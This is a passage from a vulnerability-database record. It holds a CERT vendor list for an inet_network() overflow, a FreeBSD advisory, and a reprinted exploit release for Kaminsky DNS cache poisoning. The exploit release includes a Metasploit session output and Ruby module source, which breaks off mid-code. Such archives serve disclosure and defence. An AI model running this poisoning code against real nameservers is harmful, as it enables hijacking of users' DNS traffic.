Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fedora Project Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fujitsu Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Gentoo Linux Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Gnu ADNS Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hitachi Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation (zseries) Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM eServer Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Internet Software Consortium Unknown\n\nNotified: December 10, 2007 Updated: December 10, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Juniper Networks, Inc. Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Lucent Technologies Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Men &amp; Mice Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Metasolv Software, Inc. Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### MontaVista Software, Inc. Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NEC Corporation Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NetBSD Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Nortel Networks, Inc. Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Novell, Inc. Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### QNX, Software Systems, Inc. Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Red Hat, Inc. Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### SUSE Linux Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Shadowsupport Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Silicon Graphics, Inc. Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Slackware Linux Inc. Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sony Corporation Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sun Microsystems, Inc. Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### The SCO Group Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Trustix Secure Linux Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Turbolinux Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ubuntu Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Unisys Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Wind River Systems, Inc. Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\nView all 51 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://security.freebsd.org/advisories/FreeBSD-SA-08:02.libc.asc>\n * [http://sourceware.org/cgi-bin/cvsweb.cgi/libc/inet/inet_net.c.diff?r1=1.6.2.1&amp;r2=1.6.2.2&amp;cvsroot=glibc&amp;f=h](<http://sourceware.org/cgi-bin/cvsweb.cgi/libc/inet/inet_net.c.diff?r1=1.6.2.1&r2=1.6.2.2&cvsroot=glibc&f=h>)\n * [http://sourceware.org/cgi-bin/cvsweb.cgi/libc/inet/inet_net.c.diff?r1=1.8&amp;r2=1.9&amp;cvsroot=glibc&amp;f=h](<http://sourceware.org/cgi-bin/cvsweb.cgi/libc/inet/inet_net.c.diff?r1=1.8&r2=1.9&cvsroot=glibc&f=h>)\n * <http://www.securityfocus.com/bid/27283>\n * <http://securitytracker.com/alerts/2008/Jan/1019189.html>\n * <http://secunia.com/advisories/28367>\n * <http://xforce.iss.net/xforce/xfdb/39670>\n\n### Acknowledgements\n\nThanks to Mark Andrews of ISC for reporting this vulnerability.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2008-0122](<http://web.nvd.nist.gov/vuln/detail/CVE-2008-0122>) \n---|--- \n**Severity Metric:** | 0.76 \n**Date Public:** | 2007-12-10 \n**Date First Published:** | 2008-01-25 \n**Date Last Updated: ** | 2008-04-28 13:54 UTC \n**Document Revision: ** | 16 \n", "modified": "2008-04-28T13:54:00", "published": "2008-01-25T00:00:00", "id": "VU:203611", "href": "https://www.kb.cert.org/vuls/id/203611", "type": "cert", "title": "inet_network() off-by-one buffer overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:28", "bulletinFamily": "software", "cvelist": ["CVE-2008-0122"], "description": "Off-by-one heap overflow in inet_network&#40;&#41; .", "edition": 1, "modified": "2008-01-16T00:00:00", "published": "2008-01-16T00:00:00", "id": "SECURITYVULNS:VULN:8571", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8571", "title": "FreeBSD libc / libbind memory corruption", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:24", "bulletinFamily": "software", "cvelist": ["CVE-2008-0122"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n=============================================================================\r\nFreeBSD-SA-08:02.libc Security Advisory\r\n The FreeBSD Project\r\n\r\nTopic: inet_network&#40;&#41; buffer overflow\r\n\r\nCategory: core\r\nModule: libc\r\nAnnounced: 2008-01-14\r\nCredits: Bjoern A. Zeeb and Nate Eldredge\r\nAffects: FreeBSD 6.2\r\nCorrected: 2008-01-14 22:57:45 UTC &#40;RELENG_7, 7.0-PRERELEASE&#41;\r\n 2008-01-14 22:55:54 UTC &#40;RELENG_7_0, 7.0-RC2&#41;\r\n 2008-01-14 22:56:05 UTC &#40;RELENG_6, 6.3-PRERELEASE&#41;\r\n 2008-01-14 22:56:18 UTC &#40;RELENG_6_3, 6.3-RELEASE&#41;\r\n 2008-01-14 22:56:44 UTC &#40;RELENG_6_2, 6.2-RELEASE-p10&#41;\r\nCVE Name: CVE-2008-0122\r\n\r\nFor general information regarding FreeBSD Security Advisories,\r\nincluding descriptions of the fields above, security branches, and the\r\nfollowing sections, please visit &lt;URL:http://security.FreeBSD.org/&gt;.\r\n\r\nI. Background\r\n\r\nThe resolver is the part of libc that resolves hostnames &#40;example.com&#41; to\r\ninternet protocol &#40;IP&#41; addresses &#40;192.0.2.1&#41; and vice versa.\r\n\r\nThe inet_network&#40;&#41; function returns an in_addr_t representing the network\r\naddress of the IP address given to inet_network&#40;&#41; as a character string in\r\nthe dot-notation.\r\n\r\nII. Problem Description\r\n\r\nAn off-by-one error in the inet_network&#40;&#41; function could lead to memory\r\ncorruption with certain inputs.\r\n\r\nIII. Impact\r\n\r\nFor programs which passes untrusted data to inet_network&#40;&#41;, an\r\nattacker may be able to overwrite a region of memory with user defined\r\ndata by causing specially crafted input to be passed to\r\ninet_network&#40;&#41;.\r\n\r\nDepending on the region of memory the attacker is able to overwrite,\r\nthis might lead to a denial of service or potentially code execution\r\nin the program using inet_network&#40;&#41;.\r\n\r\nIV. Workaround\r\n\r\nNo workaround is available.\r\n\r\nV. Solution\r\n\r\nPerform one of the following:\r\n\r\n1&#41; Upgrade your vulnerable system to 7.0-PRERELEASE, or 6-STABLE, or\r\nto the, RELENG_7_0, RELENG_6_3, or RELENG_6_2 security branch dated\r\nafter the correction date.\r\n\r\n2&#41; To patch your present system:\r\n\r\nThe following patches have been verified to apply to FreeBSD 7.0, 6.3,\r\nor 6.2 systems.\r\n\r\na&#41; Download the relevant patch from the location below, and verify the\r\ndetached PGP signature using your PGP utility.\r\n\r\n# fetch http://security.FreeBSD.org/patches/SA-08:02/libc.patch\r\n# fetch http://security.FreeBSD.org/patches/SA-08:02/libc.patch.asc\r\n\r\nb&#41; Execute the following commands as root:\r\n\r\n# cd /usr/src\r\n# patch &lt; /path/to/patch\r\n\r\nc&#41; Recompile the operating system as described in\r\n&lt;URL: http://www.freebsd.org/handbook/makeworld.html&gt; and reboot the\r\nsystem.\r\n\r\nVI. Correction details\r\n\r\nThe following list contains the revision numbers of each file that was\r\ncorrected in FreeBSD.\r\n\r\nBranch Revision\r\n Path\r\n- -------------------------------------------------------------------------\r\nRELENG_6\r\n src/lib/libc/inet/inet_network.c 1.2.2.2\r\nRELENG_6_3\r\n src/UPDATING 1.416.2.37.2.3\r\n src/sys/conf/newvers.sh 1.69.2.15.2.3\r\n src/lib/libc/inet/inet_network.c 1.2.2.1.4.1\r\nRELENG_6_2\r\n src/UPDATING 1.416.2.29.2.13\r\n src/sys/conf/newvers.sh 1.69.2.13.2.13\r\n src/lib/libc/inet/inet_network.c 1.2.2.1.2.1\r\nRELENG_7\r\n src/lib/libc/inet/inet_network.c 1.4.2.1\r\nRELENG_7_0\r\n src/UPDATING 1.507.2.3.2.1\r\n src/sys/conf/newvers.sh 1.72.2.5.2.2\r\n src/lib/libc/inet/inet_network.c 1.4.4.1\r\n- -------------------------------------------------------------------------\r\n\r\nVII. References\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0122\r\n\r\nThe latest revision of this advisory is available at\r\nhttp://security.FreeBSD.org/advisories/FreeBSD-SA-08:02.libc.asc\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.7 &#40;FreeBSD&#41;\r\n\r\niD8DBQFHi+ntFdaIBMps37IRAr+GAJ9YxPIsD5OeyYkrwo5auWKgQwZRywCdHSrY\r\nNsNxcHsgdo7divn+LEkQ9po=\r\n=3RQQ\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2008-01-16T00:00:00", "published": "2008-01-16T00:00:00", "id": "SECURITYVULNS:DOC:18862", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18862", "title": "FreeBSD Security Advisory FreeBSD-SA-08:02.libc", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:27", "bulletinFamily": "software", "cvelist": ["CVE-2008-1447"], "description": " ____ ____ __ __\r\n / &#92; / &#92; | | | |\r\n ----====####/ /&#92;__&#92;##/ /&#92; &#92;##| |##| |####====----\r\n | | | |__| | | | | |\r\n | | ___ | __ | | | | |\r\n ------======######&#92; &#92;/ /#| |##| |#| |##| |######======------\r\n &#92;____/ |__| |__| &#92;______/\r\n \r\n Computer Academic Underground\r\n http://www.caughq.org\r\n Exploit Code\r\n\r\n===============/========================================================\r\nExploit ID: CAU-EX-2008-0002\r\nRelease Date: 2008.07.23\r\nTitle: bailiwicked_host.rb\r\nDescription: Kaminsky DNS Cache Poisoning Flaw Exploit\r\nTested: BIND 9.4.1-9.4.2\r\nAttributes: Remote, Poison, Resolver, Metasploit\r\nExploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0002.txt\r\nAuthor/Email: I&#41;ruid &lt;druid &#40;@&#41; caughq.org&gt;\r\n H D Moore &lt;hdm &#40;@&#41; metasploit.com&gt;\r\n===============/========================================================\r\n\r\nDescription\r\n===========\r\n\r\nThis exploit targets a fairly ubiquitous flaw in DNS implementations\r\nwhich allow the insertion of malicious DNS records into the cache of the\r\ntarget nameserver. This exploit caches a single malicious host entry\r\ninto the target nameserver. By causing the target nameserver to query\r\nfor random hostnames at the target domain, the attacker can spoof a\r\nresponse to the target server including an answer for the query, an\r\nauthority server record, and an additional record for that server,\r\ncausing target nameserver to insert the additional record into the\r\ncache.\r\n\r\n\r\nExample\r\n=======\r\n\r\n# /msf3/msfconsole\r\n\r\n _ _ _ _\r\n | | | | &#40;_&#41; |\r\n _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_\r\n| &#39;_ &#96; _ &#92; / _ &#92; __/ _&#96; / __| &#39;_ &#92;| |/ _ &#92;| | __|\r\n| | | | | | __/ || &#40;_| &#92;__ &#92; |_&#41; | | &#40;_&#41; | | |_\r\n|_| |_| |_|&#92;___|&#92;__&#92;__,_|___/ .__/|_|&#92;___/|_|&#92;__|\r\n | |\r\n |_|\r\n\r\n\r\n =[ msf v3.2-release\r\n+ -- --=[ 298 exploits - 124 payloads\r\n+ -- --=[ 18 encoders - 6 nops\r\n =[ 72 aux\r\n\r\nmsf &gt; use auxiliary/spoof/dns/bailiwicked_host\r\nmsf auxiliary&#40;bailiwicked_host&#41; &gt; show options\r\n\r\nModule options:\r\n\r\n Name Current Setting Required Description\r\n ---- --------------- -------- -----------\r\n HOSTNAME pwned.example.com yes Hostname to hijack\r\n NEWADDR 1.3.3.7 yes New address for hostname\r\n RECONS 208.67.222.222 yes Nameserver used for reconnaissance\r\n RHOST yes The target address\r\n SRCPORT yes The target server&#39;s source query port &#40;0 for automatic&#41;\r\n XIDS 10 yes Number of XIDs to try for each query\r\n\r\nmsf auxiliary&#40;bailiwicked_host&#41; &gt; set RHOST A.B.C.D\r\nRHOST =&gt; A.B.C.D\r\n\r\nmsf auxiliary&#40;bailiwicked_host&#41; &gt; check\r\n[*] Using the Metasploit service to verify exploitability...\r\n[*] &gt;&gt; ADDRESS: A.B.C.D PORT: 48178\r\n[*] &gt;&gt; ADDRESS: A.B.C.D PORT: 48178\r\n[*] &gt;&gt; ADDRESS: A.B.C.D PORT: 48178\r\n[*] &gt;&gt; ADDRESS: A.B.C.D PORT: 48178\r\n[*] &gt;&gt; ADDRESS: A.B.C.D PORT: 48178\r\n[*] FAIL: This server uses static source ports and is vulnerable to poisoning\r\n\r\nmsf auxiliary&#40;bailiwicked_host&#41; &gt; set SRCPORT 0\r\nSRCPORT =&gt; 0\r\n\r\nmsf auxiliary&#40;bailiwicked_host&#41; &gt; run\r\n[*] Switching to target port 48178 based on Metasploit service\r\n[*] Targeting nameserver A.B.C.D\r\n[*] Querying recon nameserver for example.com.&#39;s nameservers...\r\n[*] Got answer with 2 answers, 0 authorities\r\n[*] Got an NS record: example.com. 172643 IN NS ns89.worldnic.com.\r\n[*] Querying recon nameserver for address of ns89.worldnic.com....\r\n[*] Got answer with 1 answers, 0 authorities\r\n[*] Got an A record: ns89.worldnic.com. 172794 IN A 205.178.190.45\r\n[*] Checking Authoritativeness: Querying 205.178.190.45 for example.com....\r\n[*] ns89.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as\r\n[*] Got an NS record: example.com. 172643 IN NS ns90.worldnic.com.\r\n[*] Querying recon nameserver for address of ns90.worldnic.com....\r\n[*] Got answer with 1 answers, 0 authorities\r\n[*] Got an A record: ns90.worldnic.com. 172794 IN A 205.178.144.45\r\n[*] Checking Authoritativeness: Querying 205.178.144.45 for example.com....\r\n[*] ns90.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as\r\n[*] Attempting to inject a poison record for pwned.example.com. into A.B.C.D:48178...\r\n[*] Sent 1000 queries and 20000 spoofed responses...\r\n[*] Sent 2000 queries and 40000 spoofed responses...\r\n[*] Sent 3000 queries and 60000 spoofed responses...\r\n[*] Sent 4000 queries and 80000 spoofed responses...\r\n[*] Sent 5000 queries and 100000 spoofed responses...\r\n[*] Sent 6000 queries and 120000 spoofed responses...\r\n[*] Sent 7000 queries and 140000 spoofed responses...\r\n[*] Poisoning successful after 7000 attempts: pwned.example.com == 1.3.3.7\r\n[*] Auxiliary module execution completed\r\nmsf auxiliary&#40;bailiwicked_host&#41; &gt; \r\n\r\nmsf auxiliary&#40;bailiwicked_host&#41; &gt; nslookup pwned.example.com A.B.C.D\r\n[*] exec: nslookup pwned.example.com A.B.C.D\r\n\r\nServer: A.B.C.D\r\nAddress: A.B.C.D#53\r\n\r\nNon-authoritative answer:\r\nName: pwned.example.com\r\nAddress: 1.3.3.7\r\n\r\n\r\nCredits\r\n=======\r\n\r\nDan Kaminsky is credited with originally discovering this vulnerability.\r\n\r\n\r\nReferences\r\n==========\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\r\nhttp://www.kb.cert.org/vuls/id/800113\r\n\r\n\r\nMetasploit\r\n==========\r\n\r\nrequire &#39;msf/core&#39;\r\nrequire &#39;net/dns&#39;\r\nrequire &#39;scruby&#39;\r\nrequire &#39;resolv&#39;\r\n\r\nmodule Msf\r\n\r\nclass Auxiliary::Spoof::Dns::BailiWickedHost &lt; Msf::Auxiliary\r\n\r\n include Exploit::Remote::Ip\r\n\r\n def initialize&#40;info = {}&#41;\r\n super&#40;update_info&#40;info, \r\n &#39;Name&#39; =&gt; &#39;DNS BailiWicked Host Attack&#39;,\r\n &#39;Description&#39; =&gt; &#37;q{\r\n This exploit attacks a fairly ubiquitous flaw in DNS implementations\r\nwhich \r\n Dan Kaminsky found and disclosed ~Jul 2008. This exploit caches a\r\nsingle\r\n malicious host entry into the target nameserver by sending random\r\nsub-domain\r\n queries to the target DNS server coupled with spoofed replies to those\r\n queries from the authoritative nameservers for the domain which\r\ncontain a\r\n malicious host entry for the hostname to be poisoned in the authority\r\nand\r\n additional records sections. Eventually, a guessed ID will match and\r\nthe\r\n spoofed packet will get accepted, and due to the additional hostname\r\nentry\r\n being within bailiwick constraints of the original request the\r\nmalicious host\r\n entry will get cached.\r\n },\r\n &#39;Author&#39; =&gt; [ &#39;I&#41;ruid&#39;, &#39;hdm&#39; ],\r\n &#39;License&#39; =&gt; MSF_LICENSE,\r\n &#39;Version&#39; =&gt; &#39;$Revision: 5585 $&#39;,\r\n &#39;References&#39; =&gt;\r\n [\r\n [ &#39;CVE&#39;, &#39;2008-1447&#39; ],\r\n [ &#39;US-CERT-VU&#39;, &#39;8000113&#39; ],\r\n [ &#39;URL&#39;,\r\n&#39;http://www.caughq.org/exploits/CAU-EX-2008-0002.txt&#39; ],\r\n ],\r\n &#39;Privileged&#39; =&gt; true,\r\n &#39;Targets&#39; =&gt; \r\n [\r\n [&quot;BIND&quot;, \r\n {\r\n &#39;Arch&#39; =&gt; ARCH_X86,\r\n &#39;Platform&#39; =&gt; &#39;linux&#39;,\r\n },\r\n ],\r\n ],\r\n &#39;DisclosureDate&#39; =&gt; &#39;Jul 21 2008&#39;\r\n &#41;&#41;\r\n \r\n register_options&#40;\r\n [\r\n OptPort.new&#40;&#39;SRCPORT&#39;, [true, &quot;The target server&#39;s source\r\nquery port &#40;0 for automatic&#41;&quot;, nil]&#41;,\r\n OptString.new&#40;&#39;HOSTNAME&#39;, [true, &#39;Hostname to hijack&#39;,\r\n&#39;pwned.example.com&#39;]&#41;,\r\n OptAddress.new&#40;&#39;NEWADDR&#39;, [true, &#39;New address for hostname&#39;,\r\n&#39;1.3.3.7&#39;]&#41;,\r\n OptAddress.new&#40;&#39;RECONS&#39;, [true, &#39;Nameserver used for\r\nreconnaissance&#39;, &#39;208.67.222.222&#39;]&#41;,\r\n OptInt.new&#40;&#39;XIDS&#39;, [true, &#39;Number of XIDs to try for each\r\nquery&#39;, 10]&#41;,\r\n OptInt.new&#40;&#39;TTL&#39;, [true, &#39;TTL for the malicious host entry&#39;,\r\n31337]&#41;,\r\n ], self.class&#41;\r\n \r\n end\r\n \r\n def auxiliary_commands\r\n return { &quot;check&quot; =&gt; &quot;Determine if the specified DNS server &#40;RHOST&#41; is vulnerable&quot; }\r\n end\r\n\r\n def cmd_check&#40;*args&#41;\r\n targ = args[0] || rhost&#40;&#41;\r\n if&#40;not &#40;targ and targ.length &gt; 0&#41;&#41;\r\n print_status&#40;&quot;usage: check [dns-server]&quot;&#41;\r\n return\r\n end\r\n\r\n print_status&#40;&quot;Using the Metasploit service to verify exploitability...&quot;&#41;\r\n srv_sock = Rex::Socket.create_udp&#40;\r\n &#39;PeerHost&#39; =&gt; targ,\r\n &#39;PeerPort&#39; =&gt; 53\r\n &#41; \r\n\r\n random = false\r\n ports = []\r\n lport = nil\r\n \r\n 1.upto&#40;5&#41; do |i|\r\n \r\n req = Resolv::DNS::Message.new\r\n txt = &quot;spoofprobe-check-#{i}-#{$$}#{&#40;rand&#40;&#41;*1000000&#41;.to_i}.red.metasploit.com&quot;\r\n req.add_question&#40;txt, Resolv::DNS::Resource::IN::TXT&#41;\r\n req.rd = 1\r\n \r\n srv_sock.put&#40;req.encode&#41;\r\n res, addr = srv_sock.recvfrom&#40;&#41;\r\n \r\n\r\n if res and res.length &gt; 0\r\n res = Resolv::DNS::Message.decode&#40;res&#41;\r\n res.each_answer do |name, ttl, data|\r\n if &#40;name.to_s == txt and data.strings.join&#40;&#39;&#39;&#41; =~\r\n/^&#40;[^&#92;s]+&#41;&#92;s+.*red&#92;.metasploit&#92;.com/m&#41;\r\n t_addr, t_port = $1.split&#40;&#39;:&#39;&#41;\r\n\r\n print_status&#40;&quot; &gt;&gt; ADDRESS: #{t_addr} PORT:\r\n#{t_port}&quot;&#41;\r\n t_port = t_port.to_i\r\n if&#40;lport and lport != t_port&#41;\r\n random = true\r\n end\r\n lport = t_port\r\n ports &lt;&lt; t_port\r\n end\r\n end\r\n end \r\n end\r\n \r\n srv_sock.close\r\n \r\n if&#40;ports.length &lt; 5&#41;\r\n print_status&#40;&quot;UNKNOWN: This server did not reply to our vulnerability check\r\nrequests&quot;&#41;\r\n return\r\n end\r\n \r\n if&#40;random&#41;\r\n print_status&#40;&quot;PASS: This server does not use a static source port. Ports:\r\n#{ports.join&#40;&quot;, &quot;&#41;}&quot;&#41;\r\n print_status&#40;&quot; This server may still be exploitable, but not by this\r\ntool.&quot;&#41;\r\n else\r\n print_status&#40;&quot;FAIL: This server uses static source ports and is vulnerable to\r\npoisoning&quot;&#41;\r\n end\r\n end\r\n \r\n def run\r\n target = rhost&#40;&#41;\r\n source = Rex::Socket.source_address&#40;target&#41;\r\n sport = datastore[&#39;SRCPORT&#39;]\r\n hostname = datastore[&#39;HOSTNAME&#39;] + &#39;.&#39;\r\n address = datastore[&#39;NEWADDR&#39;]\r\n recons = datastore[&#39;RECONS&#39;]\r\n xids = datastore[&#39;XIDS&#39;].to_i\r\n ttl = datastore[&#39;TTL&#39;].to_i\r\n xidbase = rand&#40;4&#41;+2*10000\r\n\r\n domain = hostname.match&#40;/[^&#92;x2e]+&#92;x2e[^&#92;x2e]+&#92;x2e$/&#41;[0]\r\n\r\n srv_sock = Rex::Socket.create_udp&#40;\r\n &#39;PeerHost&#39; =&gt; target,\r\n &#39;PeerPort&#39; =&gt; 53\r\n &#41;\r\n\r\n # Get the source port via the metasploit service if it&#39;s not set\r\n if sport.to_i == 0\r\n req = Resolv::DNS::Message.new\r\n txt = &quot;spoofprobe-#{$$}#{&#40;rand&#40;&#41;*1000000&#41;.to_i}.red.metasploit.com&quot;\r\n req.add_question&#40;txt, Resolv::DNS::Resource::IN::TXT&#41;\r\n req.rd = 1\r\n \r\n srv_sock.put&#40;req.encode&#41;\r\n res, addr = srv_sock.recvfrom&#40;&#41;\r\n \r\n if res and res.length &gt; 0\r\n res = Resolv::DNS::Message.decode&#40;res&#41;\r\n res.each_answer do |name, ttl, data|\r\n if &#40;name.to_s == txt and data.strings.join&#40;&#39;&#39;&#41; =~\r\n/^&#40;[^&#92;s]+&#41;&#92;s+.*red&#92;.metasploit&#92;.com/m&#41;\r\n t_addr, t_port = $1.split&#40;&#39;:&#39;&#41;\r\n sport = t_port.to_i\r\n\r\n print_status&#40;&quot;Switching to target port #{sport} based\r\non Metasploit service&quot;&#41;\r\n if target != t_addr\r\n print_status&#40;&quot;Warning: target address\r\n#{target} is not the same as the nameserver&#39;s query source address #{t_addr}!&quot;&#41;\r\n end\r\n end\r\n end\r\n end\r\n end\r\n\r\n # Verify its not already cached\r\n begin\r\n query = Resolv::DNS::Message.new\r\n query.add_question&#40;hostname, 